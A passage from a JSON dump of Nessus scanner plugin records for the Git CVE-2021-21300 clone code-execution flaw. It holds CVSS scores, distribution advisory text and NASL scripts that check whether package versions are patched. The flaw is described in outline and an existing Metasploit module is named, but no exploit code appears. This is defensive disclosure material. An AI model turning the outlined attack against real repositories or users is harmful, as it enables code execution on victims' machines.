"HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "GLSA-202104-01 : Git: User-assisted execution of arbitrary code", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:git", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202104-01.NASL", "href": "https://www.tenable.com/plugins/nessus/149221", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202104-01.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149221);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"GLSA\", value:\"202104-01\");\n\n script_name(english:\"GLSA-202104-01 : Git: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202104-01\n(Git: User-assisted execution of arbitrary code)\n\n It was discovered that Git could be fooled into running remote code\n during a clone on case-insensitive file systems with support for symbolic\n links, if Git is configured globally to apply delay-capable clean/smudge\n filters (such as Git LFS).\n \nImpact :\n\n A remote attacker could entice a user to clone a specially crafted\n repository, possibly resulting in the remote execution of arbitrary code\n with the privileges of the user running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202104-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Git users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-2.26.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/git\", unaffected:make_list(\"ge 2.26.3\"), vulnerable:make_list(\"lt 2.26.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-19T14:37:25", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 host has packages installed that are affected by a vulnerability as referenced in the USN-4761-1 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 : Git vulnerability (USN-4761-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10", "p-cpe:/a:canonical:ubuntu_linux:git", "p-cpe:/a:canonical:ubuntu_linux:git-all", "p-cpe:/a:canonical:ubuntu_linux:git-arch", "p-cpe:/a:canonical:ubuntu_linux:git-core", "p-cpe:/a:canonical:ubuntu_linux:git-cvs", "p-cpe:/a:canonical:ubuntu_linux:git-daemon-run", "p-cpe:/a:canonical:ubuntu_linux:git-daemon-sysvinit", "p-cpe:/a:canonical:ubuntu_linux:git-el", "p-cpe:/a:canonical:ubuntu_linux:git-email", "p-cpe:/a:canonical:ubuntu_linux:git-gui", "p-cpe:/a:canonical:ubuntu_linux:git-man", "p-cpe:/a:canonical:ubuntu_linux:git-mediawiki", "p-cpe:/a:canonical:ubuntu_linux:git-svn", "p-cpe:/a:canonical:ubuntu_linux:gitk", "p-cpe:/a:canonical:ubuntu_linux:gitweb"], "id": "UBUNTU_USN-4761-1.NASL", "href": "https://www.tenable.com/plugins/nessus/148010", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4761-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148010);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"USN\", value:\"4761-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 : Git vulnerability (USN-4761-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 host has packages installed that are affected by a\nvulnerability as referenced in the USN-4761-1 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4761-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-daemon-run\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-daemon-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gitweb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04|20\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04 / 20.04 / 20.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'git', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-all', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-arch', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-core', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-cvs', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-daemon-run', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-daemon-sysvinit', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-el', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-email', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-gui', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-man', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-mediawiki', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'git-svn', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'gitk', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '16.04', 'pkgname': 'gitweb', 'pkgver': '1:2.7.4-0ubuntu1.10'},\n {'osver': '18.04', 'pkgname': 'git', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-all', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-cvs', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-daemon-run', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-daemon-sysvinit', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-el', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-email', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-gui', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-man', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-mediawiki', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'git-svn', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'gitk', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '18.04', 'pkgname': 'gitweb', 'pkgver': '1:2.17.1-1ubuntu0.8'},\n {'osver': '20.04', 'pkgname': 'git', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-all', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-cvs', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-daemon-run', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-daemon-sysvinit', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-el', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-email', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-gui', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-man', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-mediawiki', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'git-svn', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'gitk', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.04', 'pkgname': 'gitweb', 'pkgver': '1:2.25.1-1ubuntu3.1'},\n {'osver': '20.10', 'pkgname': 'git', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-all', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-cvs', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-daemon-run', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-daemon-sysvinit', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-el', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-email', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-gui', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-man', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-mediawiki', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'git-svn', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'gitk', 'pkgver': '1:2.27.0-1ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'gitweb', 'pkgver': '1:2.27.0-1ubuntu1.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git / git-all / git-arch / git-core / git-cvs / git-daemon-run / etc');\n}", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:12", "description": "An update of the git package has been released.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-24T00:00:00", "type": "nessus", "title": "Photon OS 4.0: Git PHSA-2021-4.0-0004", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:4.0"], "id": "PHOTONOS_PHSA-2021-4_0-0004_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/148030", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-4.0-0004. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148030);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"Photon OS 4.0: Git PHSA-2021-4.0-0004\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-4.0-4.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:4.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 4\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 4.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'git-2.30.0-3.ph4')) flag++;\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'git-lang-2.30.0-3.ph4')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:56", "description": "The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2021-ffd0b2108d advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 